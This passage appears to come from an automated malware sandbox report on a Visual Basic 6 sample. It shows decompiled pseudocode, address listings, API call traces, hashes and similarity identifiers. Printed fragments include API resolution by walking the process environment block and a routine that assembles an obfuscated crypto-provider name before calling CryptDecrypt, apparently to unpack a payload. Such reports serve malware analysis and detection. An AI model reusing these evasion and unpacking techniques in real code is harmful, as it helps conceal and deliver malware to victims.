							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							 *((intOrPtr*)(_t271 + _t271 + 0x40)) =  *((intOrPtr*)(_t271 + _t271 + 0x40)) + _t271;
						}
						if(_t310 < 0) {
							asm("aaa");
							asm("aaa");
							 *((intOrPtr*)(_t261 + 0x61)) =  *((intOrPtr*)(_t261 + 0x61)) + _t183;
							asm("o16 jae 0x6b");
							asm("o16 jae 0x6a");
							asm("insd");
							 *_t183 =  *_t183 + _t183;
							_t261 = _t261 + 1;
							asm("popad");
							asm("o16 jae 0x6b");
							asm("o16 jae 0x6a");
							asm("insd");
							_t280 =  *(_t261 + 0x65) * 0x66;
							 *_t183 =  *_t183 + _t183;
							_t249 = _t183 + 0xd;
							 *_t249 =  *_t249 + _t249;
							_t183 = _t249 + 0xd &  *(_t249 + 0xd);
							 *_t183 =  *_t183 + _t183;
							 *_t183 =  *_t183 + _t183;
							asm("pushad");
						}
						_push(_t294);
						_t271 = _t271 + 1;
						 *_t183 =  *_t183 + _t271;
						 *_t261 =  *_t261 + 1;
						asm("adc byte [ebx], 0x0");
						_t183 = _t183 + _t266;
						asm("adc [eax+eax+0x6], eax");
						asm("adc [eax], al");
						asm("rcl byte [ecx], 0x44");
						 *_t183 =  *_t183 + _t183;
						 *_t183 =  *_t183 + _t183;
						 *_t183 =  *_t183 + _t183;
						 *_t183 =  *_t183 + _t183;
						 *_t183 =  *_t183 + _t183;
						 *_t183 =  *_t183 + _t183;
						goto L17;
					}
				} else {
					asm("insd");
					_t299 = es;
					asm("adc eax, [eax]");
					_t256 = (_t175 | 0x00000025) + 1;
					 *_t256 =  *_t256 + 0xb;
					 *_t256 =  *_t256 + _t256;
					_t290 = _t299 + 1;
					goto ( *((intOrPtr*)(_t286 + _t278)));
				}
			}

0x0040121c
0x0040121c
0x0040121c
0x00401221
0x00401226
0x00401228
0x0040122a
0x0040122c
0x0040122e
0x00401230
0x00401231
0x00401233
0x00401235
0x00401237
0x00401239
0x0040123d
0x00401240
0x00401244
0x00401248
0x0040124a
0x0040124c
0x0040124e
0x00401250
0x00401252
0x00401254
0x00401256
0x00401258
0x00401259
0x0040125a
0x00401260
0x00401264
0x00401265
0x00401269
0x0040126b
0x0040126d
0x0040126f
0x00401271
0x00401273
0x00401275
0x00401277
0x0040127a
0x0040127b
0x0040127d
0x00401281
0x00401284
0x00401286
0x00401288
0x0040128a
0x0040128c
0x0040128e
0x00401290
0x00401292
0x00401297
0x00401299
0x0040129d
0x0040129f
0x004012a1
0x004012a8
0x004012aa
0x004012ac
0x004012ae
0x004012b3
0x004012b5
0x004012b8
0x004012bb
0x004012bd
0x004012c1
0x004012c3
0x004012c5
0x004012c7
0x004012c9
0x004012cd
0x004012d0
0x004012d1
0x004012d5
0x004012d7
0x004012d9
0x004012da
0x004012db
0x004012dc
0x004012de
0x004012e0
0x004012e2
0x004012e4
0x004012e6
0x004012e8
0x004012e9
0x004012ec
0x004012ee
0x004012f0
0x004012f2
0x004012f3
0x004012f5
0x004012f7
0x004012f9
0x004012fb
0x004012fd
0x004012ff
0x00401301
0x00401303
0x00401307
0x00401309
0x0040130d
0x0040130f
0x00401311
0x00401315
0x00401317
0x00401319
0x0040131b
0x0040131d
0x0040131f
0x00401322
0x00401323
0x00401325
0x00401329
0x0040132c
0x0040132e
0x00401330
0x00401332
0x00401334
0x00401336
0x00401338
0x0040133a
0x0040133c
0x0040133d
0x00401340
0x00401341
0x00401345
0x00401347
0x00401347
0x0040134a
0x0040134c
0x0040134e
0x00401350
0x00401350
0x00401352
0x00401354
0x00401377
0x00401379
0x0040137b
0x0040137d
0x0040137f
0x00401381
0x00401383
0x00401385
0x00401387
0x0040138e
0x00401390
0x00401392
0x00401394
0x00401396
0x00401398
0x0040139a
0x0040139c
0x0040139e
0x004013a5
0x004013a7
0x004013ad
0x004013af
0x004013b2
0x004013b4
0x004013b9
0x004013ba
0x004013bc
0x004013c3
0x004013c3
0x004013c4
0x004013c6
0x004013c8
0x004013ca
0x004013cc
0x004013ce
0x004013d0
0x004013d2
0x004013d9
0x004013db
0x004013dd
0x004013df
0x004013e1
0x004013e3
0x004013e5
0x004013e7
0x004013e9
0x004013eb
0x004013ed
0x004013ef
0x004013f5
0x004013f7
0x004013fa
0x004013fb
0x00401402
0x00401402
0x0040140a
0x0040140e
0x0040140f
0x00401411
0x00401413
0x00401415
0x00401417
0x00401419
0x0040141b
0x0040141d
0x0040141f
0x00401421
0x00401423
0x00401427
0x00401429
0x0040142b
0x0040142d
0x0040142e
0x0040142f
0x00401436
0x00401438
0x0040143a
0x0040143c
0x0040143e
0x00401440
0x00401442
0x00401444
0x00401446
0x00401448
0x0040144d
0x00401450
0x00401454
0x00401456
0x00401457
0x0040145a
0x0040145e
0x00401460
0x00401461
0x00401463
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401471
0x00401473
0x00401475
0x00401477
0x00401477
0x00401477
0x0040147a
0x004014eb
0x004014eb
0x00000000
0x0040147c
0x0040147c
0x0040147d
0x004014e3
0x004014e3
0x004014e5
0x004014e7
0x004014e7
0x004014e9
0x004014e9
0x004014ea
0x004014ea
0x00000000
0x004014ea
0x00401480
0x00000000
0x00000000
0x00401482
0x00000000
0x00000000
0x00401484
0x00000000
0x00000000
0x00401486
0x004014ed
0x004014ed
0x004014ef
0x004014f1
0x004014f3
0x004014f5
0x004014f7
0x004014f9
0x004014fb
0x004014fd
0x004014ff
0x00401501
0x00401503
0x00401505
0x00401507
0x00401509
0x0040150b
0x0040150d
0x0040150f
0x00401511
0x00401513
0x00401515
0x00401517
0x00401519
0x0040151b
0x0040151d
0x0040151f
0x00401521
0x00401523
0x00401525
0x00401527
0x00401529
0x0040152b
0x0040152d
0x0040152f
0x00401531
0x00401533
0x00401535
0x00401537
0x00401539
0x0040153b
0x0040153d
0x0040153f
0x00401541
0x00401543
0x00401545
0x00401547
0x00401549
0x0040154b
0x0040154d
0x0040154f
0x00401551
0x00401553
0x00401555
0x00401557
0x00401559
0x0040155b
0x0040155d
0x0040155f
0x00401561
0x00401563
0x00401565
0x00401567
0x00401569
0x0040156b
0x0040156d
0x0040156f
0x00401571
0x00401573
0x00401575
0x00401577
0x00401579
0x0040157b
0x0040157d
0x0040157f
0x00401581
0x00401583
0x00401585
0x00401587
0x00401589
0x0040158b
0x0040158d
0x0040158f
0x00401591
0x00401593
0x00401595
0x00401597
0x00401599
0x0040159b
0x0040159d
0x0040159f
0x004015a1
0x004015a3
0x004015a5
0x004015a7
0x004015a9
0x004015ab
0x004015ad
0x004015af
0x004015b1
0x004015b3
0x004015b5
0x004015b7
0x004015b9
0x004015bb
0x004015bd
0x004015bf
0x004015c1
0x004015c3
0x004015c5
0x004015c7
0x004015c9
0x004015cb
0x004015cd
0x004015cf
0x004015d1
0x004015d3
0x004015d5
0x004015d7
0x004015d9
0x004015db
0x004015dd
0x004015df
0x004015e1
0x004015e3
0x004015e5
0x004015e7
0x004015e9
0x004015eb
0x004015ed
0x004015ef
0x004015f1
0x004015f3
0x004015f5
0x004015f7
0x004015f9
0x004015fb
0x004015fd
0x004015ff
0x00401601
0x00401603
0x00401605
0x00401607
0x00401609
0x0040160b
0x0040160d
0x0040160f
0x00401611
0x00401613
0x00401615
0x00401617
0x00401619
0x0040161b
0x0040161d
0x0040161f
0x00401621
0x00401623
0x00401625
0x00401627
0x00401629
0x0040162b
0x0040162d
0x0040162f
0x00401631
0x00401633
0x00401635
0x00401637
0x00401639
0x0040163b
0x0040163d
0x0040163f
0x00401641
0x00401643
0x00401645
0x00401647
0x00401649
0x0040164b
0x0040164d
0x0040164f
0x00401651
0x00401653
0x00401655
0x00401657
0x00401659
0x0040165b
0x0040165d
0x0040165f
0x00401661
0x00401663
0x00401665
0x00401667
0x00401669
0x0040166b
0x0040166d
0x0040166f
0x00401671
0x00401673
0x00401675
0x00401677
0x00401679
0x0040167b
0x0040167d
0x0040167f
0x00401681
0x00401683
0x00401685
0x00401687
0x00401689
0x0040168b
0x0040168d
0x0040168f
0x00401691
0x00401693
0x00401695
0x00401697
0x00401699
0x0040169b
0x0040169d
0x0040169f
0x004016a1
0x004016a3
0x004016a5
0x004016a7
0x004016a9
0x004016ab
0x004016ad
0x004016af
0x004016b1
0x004016b3
0x004016b5
0x004016b7
0x004016b9
0x004016bb
0x004016bd
0x004016bf
0x004016c1
0x004016c3
0x004016c5
0x004016c7
0x004016c9
0x004016cb
0x004016cd
0x004016cf
0x004016d1
0x004016d3
0x004016d5
0x004016d7
0x004016d9
0x004016db
0x004016dd
0x004016df
0x004016e1
0x004016e3
0x004016e5
0x004016e7
0x004016e7
0x00401488
0x0040148a
0x0040148b
0x0040148c
0x0040148f
0x00401495
0x00401499
0x0040149e
0x004014a0
0x004014a1
0x004014a2
0x004014a8
0x004014ac
0x004014ad
0x004014b1
0x004014b3
0x004014b5
0x004014b9
0x004014bc
0x004014be
0x004014c0
0x004014c0
0x004014c1
0x004014c2
0x004014c3
0x004014c5
0x004014c8
0x004014cb
0x004014cd
0x004014d1
0x004014d4
0x004014d7
0x004014d9
0x004014db
0x004014dd
0x004014df
0x004014e1
0x00000000
0x004014e1
0x00401356
0x00401356
0x00401358
0x00401359
0x0040135e
0x0040135f
0x00401362
0x00401364
0x00401365
0x00401365

APIs

#100.MSVBVM60(VB5!6&VB6DE.DLL), ref: 00401221

Strings

VB5!6&VB6DE.DLL, xrefs: 0040121C

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: #100
String ID: VB5!6&VB6DE.DLL
API String ID: 1341478452-1903704572
Opcode ID: 9d63552e758ea68c125351f945aa378511766dbbc5d3d0b42d9f808e2a0998ac
Instruction ID: 4be22af98733251b43131ef4de9ce4f0dbf74689f7b9a24d1b736262dd1b8964
Opcode Fuzzy Hash: 9d63552e758ea68c125351f945aa378511766dbbc5d3d0b42d9f808e2a0998ac
Instruction Fuzzy Hash: 26011F6248E7C24FD7474B714D62585BFB0AE2325431B01DBC4C1CF4A3E158589AC767

Uniqueness

Uniqueness Score: -1.00%

Function 004251CF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004251CF(WCHAR* _a4) {
				intOrPtr _t2;
				struct HINSTANCE__* _t4;
				intOrPtr _t6;

				if( *0x441008 != 0) {
					L13:
					_t4 = LoadLibraryW(_a4); // executed
					return _t4;
				}
				if( *0x441000 != 0) {
					L5:
					if( *0x441008 != 0) {
						L9:
						if( *0x441004 != 0) {
							goto L13;
						}
						E0042502F(_t2, 0x4249ed);
						_t6 = E00425271( *0x441000, "SysAllocStringByteLen");
						if(_t6 != 0) {
							 *0x441004 = _t6;
							goto L13;
						}
						return _t6;
					}
					E0042502F(_t2, 0x424997);
					_t2 = E00425271( *0x441000, "SysAllocStringByteLen");
					if(_t2 != 0) {
						 *0x441008 = _t2;
						goto L9;
					}
					return _t2;
				}
				E0042500D(_t2, 0x4249fc);
				_t2 = E004252D0("SysAllocStringByteLen");
				if(_t2 != 0) {
					 *0x441000 = _t2;
					goto L5;
				}
				return _t2;
			}

0x004251d9
0x00425263
0x0042526b
0x00000000
0x0042526b
0x004251e6
0x00425207
0x0042520e
0x00425235
0x0042523c
0x00000000
0x00000000
0x00425243
0x00425253
0x0042525a
0x0042525e
0x00000000
0x0042525e
0x00000000
0x0042525a
0x00425215
0x00425225
0x0042522c
0x00425230
0x00000000
0x00425230
0x00000000
0x0042522c
0x004251ed
0x004251f7
0x004251fe
0x00425202
0x00000000
0x00425202
0x00000000

APIs

LoadLibraryW.KERNELBASE(?,?,0042508D,?,?,SysAllocStringByteLen,000000FF,00424A5A), ref: 0042526B

Strings

SysAllocStringByteLen, xrefs: 004251F2, 0042521A, 00425248

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: SysAllocStringByteLen
API String ID: 1029625771-3231582829
Opcode ID: e074927d0f9eaff3f49c7036892bf360882613322cb5805a0df46930d563884e
Instruction ID: 9a365722527a9fb458d666b17fee7e10bc934b678a4922c523deb4d560316b94
Opcode Fuzzy Hash: e074927d0f9eaff3f49c7036892bf360882613322cb5805a0df46930d563884e
Instruction Fuzzy Hash: 07016238B45A74DADB206BA1FD02B263A90A71178DFD040BBA415919F6E77C48C48E7E

Uniqueness

Uniqueness Score: -1.00%

Function 00427AD0, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00427AD0(void* __ebx, void* __edi, void* __esi, void* __ebp) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void _v16;
				void _v20;
				char _v24;
				intOrPtr _v28;
				void* _t18;

				_v12 = 0;
				_v16 = 0;
				_v4 = 0;
				_v8 = 0;
				_v20 = E00426940(0x4291b0);
				RtlMoveMemory( &_v16,  &_v20, 4);
				_v24 = _v28 + 0xfffffffc;
				_v20 = _v16 + 4;
				_t18 = E00428DE0(__ebx, __edi, __esi,  &_v20,  &_v24); // executed
				return _t18;
			}

0x00427ada
0x00427ade
0x00427ae2
0x00427ae6
0x00427af5
0x00427aff
0x00427b17
0x00427b21
0x00427b25
0x00427b2d

APIs

RtlMoveMemory.KERNEL32(00000004,004291B0,00000004,004291B0,?,?,?,00426081), ref: 00427AFF

Part of subcall function 00428DE0: #685.MSVBVM60(?,66106AEE,660DDE99,660DC30A), ref: 00428E40
Part of subcall function 00428DE0: __vbaObjSet.MSVBVM60(?,00000000), ref: 00428E4B
Part of subcall function 00428DE0: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403088,00000044), ref: 00428E9C
Part of subcall function 00428DE0: __vbaFreeObj.MSVBVM60 ref: 00428EA5
Part of subcall function 00428DE0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00428EBD
Part of subcall function 00428DE0: RtlFillMemory.KERNEL32(00000000,00000016,00000000), ref: 00428ECA
Part of subcall function 00428DE0: #644.MSVBVM60(00401006), ref: 00428EDA
Part of subcall function 00428DE0: #644.MSVBVM60(?,00000000,00000008), ref: 00428EF0

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$#644FreeMemory$#685CheckFillHresultListMove
String ID:
API String ID: 119380213-0
Opcode ID: 1291537a623d130303e5f4780cf26933e0e57c06b260785c59842da15de6c12e
Instruction ID: d51a60be74b06bb40a9bf308176a1e18395bd55aea85e5aa232e6363c225d6ea
Opcode Fuzzy Hash: 1291537a623d130303e5f4780cf26933e0e57c06b260785c59842da15de6c12e
Instruction Fuzzy Hash: C4F0F4B5908301AFD300EF28D941A5BBBE0FB84614F40CE2EB59883250E734D908CB46

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00426ED0, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 170encryptionCOMMON

Download Yara Rule

APIs

#644.MSVBVM60(00000000,660DC6FC,00000000,660DC6D9,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F11
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F1F
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F30
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F38
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F43
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F4B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F56
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F59
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F65
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F82
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F96
__vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FA4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FAF
__vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FB7
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FC2
__vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FCA
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD5
#644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD8
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00426FE4
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427001
#644.MSVBVM60(00000000), ref: 00427015

Part of subcall function 00428560: __vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
Part of subcall function 00428560: #653.MSVBVM60(?,?), ref: 004285BB
Part of subcall function 00428560: __vbaI4Var.MSVBVM60(?), ref: 004285C5
Part of subcall function 00428560: __vbaFreeVar.MSVBVM60 ref: 004285DB
Part of subcall function 00428560: __vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
Part of subcall function 00428560: __vbaStrCat.MSVBVM60(00000000), ref: 00428604
Part of subcall function 00428560: __vbaStrMove.MSVBVM60 ref: 0042860F
Part of subcall function 00428560: __vbaFreeStr.MSVBVM60 ref: 00428614
Part of subcall function 00428560: __vbaFreeStr.MSVBVM60(00428651), ref: 0042864A

__vbaStrMove.MSVBVM60(M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}), ref: 00427028
#644.MSVBVM60(00000000), ref: 0042702B
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000), ref: 00427037
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00427049
#644.MSVBVM60(00000000), ref: 00427056
__vbaStrMove.MSVBVM60(M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}), ref: 00427069
#644.MSVBVM60(00000000), ref: 0042706C
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00427078
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042708A

Strings

M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}, xrefs: 00427017, 00427058
Microsoft, xrefs: 00426F13, 00426F98
Enhanced R, xrefs: 00426F18, 00426F9D
phic Provider, xrefs: 00426F46, 00426FC5
SA and AES Cryptogra, xrefs: 00426F33, 00426FB2

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$#644$Free$AcquireContextCrypt$List$#653Copy
String ID: Enhanced R$Microsoft$M}i}c}r}o}s}o}f}t} }E}n}h}a}n}c}e}d} }R}S}A} }a}n}d} }A}E}S} }C}r}y}p}t}o}g}r}a}p}h}i}c} }P}r}o}v}i}d}e}r} }(}P}r}o}t}o}t}y}p}e})}$SA and AES Cryptogra$phic Provider
API String ID: 3098114173-4167083701
Opcode ID: fa7c1c7694a935f1119cf56d95e4c5d37902865bf27f36431ac27f9612a293a4
Instruction ID: ca28b7fcd96ef3baa537f836da50b45b6a2ab45d454794ab024de2cdfaa2e570
Opcode Fuzzy Hash: fa7c1c7694a935f1119cf56d95e4c5d37902865bf27f36431ac27f9612a293a4
Instruction Fuzzy Hash: 21516376E40318ABDB119BB0DD4AFEF7A78EB45B41F104525E602B71C0EE785D05CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00426B80, Relevance: 37.7, APIs: 25, Instructions: 247encryptionCOMMON

Download Yara Rule

APIs

__vbaStrVarCopy.MSVBVM60(?,660DC6D9,660DC6FC,?,660DC6D9), ref: 00426BF3
__vbaStrMove.MSVBVM60 ref: 00426BFE

Part of subcall function 00426ED0: #644.MSVBVM60(00000000,660DC6FC,00000000,660DC6D9,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F11
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F1F
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F30
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F38
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F43
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F4B
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00000000,00401006), ref: 00426F56
Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F59
Part of subcall function 00426ED0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F65
Part of subcall function 00426ED0: __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F82
Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426F96
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60( Enhanced R,Microsoft,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FA4
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FAF
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(SA and AES Cryptogra,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FB7
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FC2
Part of subcall function 00426ED0: __vbaStrCat.MSVBVM60(phic Provider,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FCA
Part of subcall function 00426ED0: __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD5
Part of subcall function 00426ED0: #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00426FD8
Part of subcall function 00426ED0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008), ref: 00426FE4

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 00426C1D
__vbaVarZero.MSVBVM60 ref: 00426C46
__vbaVarMove.MSVBVM60 ref: 00426C76
__vbaVarMove.MSVBVM60 ref: 00426C92
__vbaVarMove.MSVBVM60 ref: 00426CB2
#644.MSVBVM60(?), ref: 00426CB8
__vbaVarMove.MSVBVM60 ref: 00426CDC
__vbaErase.MSVBVM60(00000000,?), ref: 00426D02
__vbaLenBstrB.MSVBVM60(?,00000000), ref: 00426D0D
CryptHashData.ADVAPI32(?,?,00000000), ref: 00426D1C
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000004,00000000), ref: 00426D33
__vbaVarZero.MSVBVM60 ref: 00426D66
__vbaVarMove.MSVBVM60 ref: 00426D9A
__vbaVarZero.MSVBVM60 ref: 00426DBD
__vbaVarMove.MSVBVM60 ref: 00426DE1
#644.MSVBVM60(?), ref: 00426DE7
__vbaVarMove.MSVBVM60 ref: 00426E0B
__vbaErase.MSVBVM60(00000000,?), ref: 00426E31
__vbaAryLock.MSVBVM60(?,660DC6D9), ref: 00426E3C
CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00401006,?), ref: 00426E5A
__vbaAryUnlock.MSVBVM60(?), ref: 00426E64
__vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00426E7F
__vbaFreeStr.MSVBVM60(00426EB7), ref: 00426EB0

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __vba$Move$#644$Crypt$RedimZero$AcquireContextEraseFree$BstrCopyDataDecryptHashListLockPreserveUnlock
String ID:
API String ID: 2077137070-0
Opcode ID: 8a83fb186709226ab4670d5998d5980bfca665e431ad4c7b271d227cce3f1471
Instruction ID: 7e2aa89034c35b787d66bff60e04a55fe2fd2c1090251dc6bb70728028a00dcb
Opcode Fuzzy Hash: 8a83fb186709226ab4670d5998d5980bfca665e431ad4c7b271d227cce3f1471
Instruction Fuzzy Hash: E7B13BB4910218DFDB18DFA8D898EEEBBB5FF48314F018219E605AB351D7B4A904CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00424F75, Relevance: 1.3, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00424F75() {
				intOrPtr _t7;
				void* _t10;
				void* _t12;
				intOrPtr* _t13;
				intOrPtr _t16;

				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
				_t16 = _t7;
				while(_t16 != _t7) {
					_push(_t7);
					_t10 = E00425366( *((intOrPtr*)(E0042500D(_t7, 0x424a16) + 0x30)), "SysAllocStringByteLen", 7);
					if(_t10 != 0) {
						_t12 = E00425366( *((intOrPtr*)(E0042500D(_t10, 0x424a2e) + 0x30)), "SysAllocStringByteLen", 7);
						if(_t12 != 0) {
							_pop(_t13);
							_t7 =  *_t13;
							continue;
						}
						return _t12 + 1;
					}
					return _t10 + 1;
				}
				return 0;
			}

0x00424f7e
0x00424f81
0x00424f83
0x00424f87
0x00424f9c
0x00424fa4
0x00424fbd
0x00424fc5
0x00424fca
0x00424fcb
0x00000000
0x00424fcb
0x00000000
0x00424fc7
0x00000000
0x00424fa6
0x00000000

Strings

SysAllocStringByteLen, xrefs: 00424F94, 00424FB5

Memory Dump Source

Source File: 00000012.00000002.782181214.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.782162276.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782388581.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000012.00000002.782411560.0000000000441000.00000004.00020000.sdmp Download File
Associated: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: SysAllocStringByteLen
API String ID: 0-3231582829
Opcode ID: ff98cf8ea9c3d839757969b105a8e99614e4b63557d08a4900aa141eea87e0b5
Instruction ID: f3fd455b17613eaa002e09c34093d789b55c92223d5e727366bcabfc63e0c317
